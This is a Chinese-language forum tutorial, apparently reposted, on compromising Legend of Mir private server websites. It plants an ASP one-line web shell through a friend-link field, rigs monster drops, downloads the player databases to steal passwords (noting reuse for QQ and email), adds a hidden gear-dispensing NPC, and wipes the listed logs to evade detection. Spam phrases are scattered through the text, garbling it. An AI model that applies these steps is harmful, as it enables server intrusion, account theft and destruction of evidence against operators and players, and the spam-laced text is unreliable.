我已经找好了 兄弟们想刷装备的要快哦 要不都被我入侵完了哟

大家认真看我操作把

这套网站的程序是 eihomemir 传奇私服全站系统 他的数据库有8个 在DATA目录下 数据库的名字分别是admin.asp article.asp diary.asp down.aspgb.asp main.asp news.asp和sites.asp竟然是asp的数据库 那么我们是不是就可以插asp木马到他数据库呢 答案是肯定的 当然可以插 怎么插? 先到他网站申请友情连接的地方在图片连接里面 写上

eval(Request.form('#')+'')呵呵这个一看就是 冰狐浪子微型ASP后门因为他网站程序的数据库是 ASP的后缀 所以我们可以插ASP的木马进去 运行木马

找到这个网站根目录: e:\Inetpub\木马在它的硬盘里寻觅传奇目录

一般默认安装为:D:\mirserve魔域俬罔r\ 下。找到了传奇的目录我们就可以开始编写传奇私服里的Rookit了,酷吧!

一、一切皆有可能--修改怪物暴率

你是否还在因为不知道好装备在哪里打,或者打了老是不爆而而烦恼呢?其实打打稻草人、挖挖洞蛆,也有好装备爆的,怎么不相信?那么一起来吧,我要告诉你的是:一切皆有可能!

修改修改怪物爆东西几率,在mirserver/Mir200/Envir/MonItems 下,所有的怪物这里都有名字,好装备都设置在一些刷得很少,而且很难打的怪物,暴装备的几率一般为1/4000 ,也就是说打4000个这种怪物才爆一样,这样有多难啊。我经过考虑后决定修改“洞蛆”,让所有的会员装备都在这里暴。因为洞蛆比较难找到,经验少,一般没有玩家会杀它,而且杀死后东西不会暴出来,必须要挖,有很高的隐蔽性(图二)。

但是这样还不够,我们做事要不留尾巴不然怎么叫传奇私服里的Rootkit。为了避免玩家不小心发现这个已魔域私服太阳城开户外挂经变成极品装备仓库的洞蛆,我们还要去一个地方设置一下。跟我来,在 mirserver/Mir200/Envir/MonGen.txt 这里可以设置怪物刷新时出现的坐标。本来有几个地方都会有洞蛆出现,现在我们把其它地方的洞蛆都取消,只设置在"半兽古墓"一个没有人来的地方并且调整刷新的范围为0,数量为1,时间为30分钟出一次(图三),这样就最大限度的避免了其他玩家与我们的极品装备仓库---洞蛆接触。嘿嘿,众乐乐,不如独乐乐!

二、盗你没商量--下载传奇数据库

看着别人身上的极品装备眼红吗?其实你也可以拥有的。完全不要盗号木马,我们可以在服务器上动点手脚,达到盗人于无形的目的!

传奇有两个数据库文件很重要,

一是:mirserver/Mud2/Logsrv/IdDB/Id.db,它记录了所有玩家注册时的密码、以及密码提示问题、答案、电话号码、生日,等很多信息。拿到这个文件,玩家可以说传奇sf是任你宰杀了,特别是那些喜欢用一个密码的,惨不可言,QQ、油箱,等等都有可能被盗。所以说玩传奇私服是非常危险的,大家还是去玩盛大安全点。(各位大哥,不要拿鸡蛋扔我啊!)

二是:mirserver/Mud2/DBSrv200/FDB/Hum.DB,记录了所有玩家的人物名所对应的ID。

现在我们先把这两个数据库下载到本地,先用记事本打开Hum.DB,查找你要盗的那位玩家的人物名,不用和他商量了啦,嘿嘿!

在人物名后面紧跟着的就是玩家的ID,把找到的ID复制一下,然后打开Id.db,查找ID对应的玩家密码,ID后面紧跟着的就是密码了。

接着去登录传奇,如果他还是注册时候的密码,那你就可以下装备了。不过有时候也会遇到玩家修改过密码的情况,这个时候就要用到一个小工具:传奇强行登录器。使用前首先把文件复制到传奇目录下,打开传奇强行登录器按上面的提示填写(图四),在检测通过后点击登录。

先传奇六合彩图3官网用自己的号上,到人物选择,到这里慢点,在开始处有2个框,细心点可以发现是自己的ID和人物名字,(图五)还犹豫什么,把ID人物名字替换成要黑的号。点开始,进去了吗?哈哈哈哈,下光装备,你也可以把GM的ID拿来玩,只是清理传奇日志的时候会多几项类容,但是GM命令里面有一条对上面介绍的修改怪物暴率刷装备的方法非常有用,可以重读怪物爆机文件,这样不用等传奇服务重起,我们修改的东西就可以生效。

三、我的地盘我做主--编写领装备NPC

什么是NPC呢?它是Non-Player-Character(非玩家控制人物)的简写,也就是说其行为是

由系统控制的,例如药店店里的老板,安全区的文明宣传员都是NPC。既然游戏是给玩家玩的,那为什么玩家不可以做主呢?不要别的,我们自己来写个领装备的ncp脚本吧!先熟悉下主要的脚本语言:

------------------------------传奇外传私服-------------------------------------------------------------

[@main] 这样的段落可以被goto @main识别

#if 条件语句(#if 如果...)

checknamelist 读取文件中的名单 (例如:checknamelist chengyuan.txt)

#say 结果语句(#say 接显示对话内容)

你的姓名

@exit 关闭窗口

give 赠与物品(例如:give 屠龙 1)

-------------------------------------------------------------------------------------------

怎么样,是不是比易语言还容易啊?并不像传说中那么高深。有了上面的脚本知识,我们就可以自己写NPC脚本了。

写NPC脚本要达到的目的是别人点这个NPC的时候,只出一月经推迟的原因传奇sf段提示,而我点的时候却可以领装备。那怎样实现呢?我们可以先把一个有自己人物名的txt文件放到服务器上,然后用checknamelist 语句来读取这个文件里面的人物名,设置只有这个人物才可以领取装备,其他玩家只有点@exit,哈哈!但是一定记得把txt文件和NPC一起放在mirserver/Mir200/Envir/Market_def/下。

要让其他玩家不怀疑,隐蔽性非常重要,最好是仿照传奇服务器上的版本信息来NPC来写,因为传奇私服服务端各有不同,大多是从网上下载来的,管理员自己都不是很清楚,其他玩家就更不用说了。我们再联系NPC放置的位置来巧妙的设置一下,比如放在比齐赌庄里面的NPC可以加入提示信息:赌庄正在装修,暂时停止开放!(光盘里有我写好的npc文件,大家看看迷惑性怎样?)

NPC脚本写好后,必须在 mirserver/Mir200/Envir/MerChan传奇外传私服t.txt 里面设定调用我们写的NPC,另外这里还可以设置NPC的坐标、NPC的人物名称、数量、代码、刷新时间。可能大家不是很明白"代码"是什么意思,其实他就是npc的外形,屠夫、铁匠、老兵,等都有自己的外形特征,有胖有瘦千万不要张冠李戴了。另外在设置/Market_def/下的NPC文件名的时候特别要注意,正确的应该是MerChant.txt中的调用文件加上地图名,要是文件名对不上是不会调用的(图六)。

四、传奇日志的清理

说到这里大家一定很奇怪,传奇的日志也用得上清理吗?其实不然,传奇有一套非常完善的日志记录,甚至可以成为警察叔叔查获你的证据。去年我通过当时最流行的数据库注入漏洞,进了一台网站服务器,不想上面还开了传奇服务。我马上就给自己弄了一个GM号,但是没几天就让发现了,他们还在网站上警告了我,当时我并没有弄清楚他们怎么发现的,只是被他们的技电视棒是什么术非魔域私服惊呆了,因为我是在肉鸡进了HTTP代理再去的他的网站,IP照样被查到。但是现在看来应该是传奇日志出卖了我。下面我把这些让人心烦的日志都列出来,大家在办完事之后一定记得把脚印擦干净!

-------------------------------------------------------------------------------------------

1、mirserver/Gamelog/logdatasrv/log/base游戏中所有与物品有关记录、交易、拣取、甚至是什么怪物爆的、以及所出物品的坐标和编号

利用"修改怪物暴率"刷装备的这个地方要特别注意删除

2、mirserver/Mir200/conlog/登录时的id、人物、在线时间、ip

利用"下载传奇数据库"盗装备的小心了,这里可是记录了你的IP地址的

3、mirserver/Mir200/LOG/GM的魔域私服所有操作

上过GM号的朋友应该注意的地方,另外千万不要用GM给自己刷装备,因为就算你把这个的记录删了,在"传奇心意控制器"的窗口上还是可以看到你的操作

4、mirserver/Mud2/Logsrv/chrlog/注册时的id 和密码、密码保护、以及修改过的密码

下载传奇数据库后,如果得到的密码不对,请来这里查看

5、mirserver/Mud2/Logsrv/conlog年-月/登录的帐号和IP

我来找找看可能是这里拉

节约时间~我就做到这里把~大家找到他的传奇的目录就把他的数据下载下来~用着个工具打开~就可以看到他的用户ID了~

我一起打包给大家把88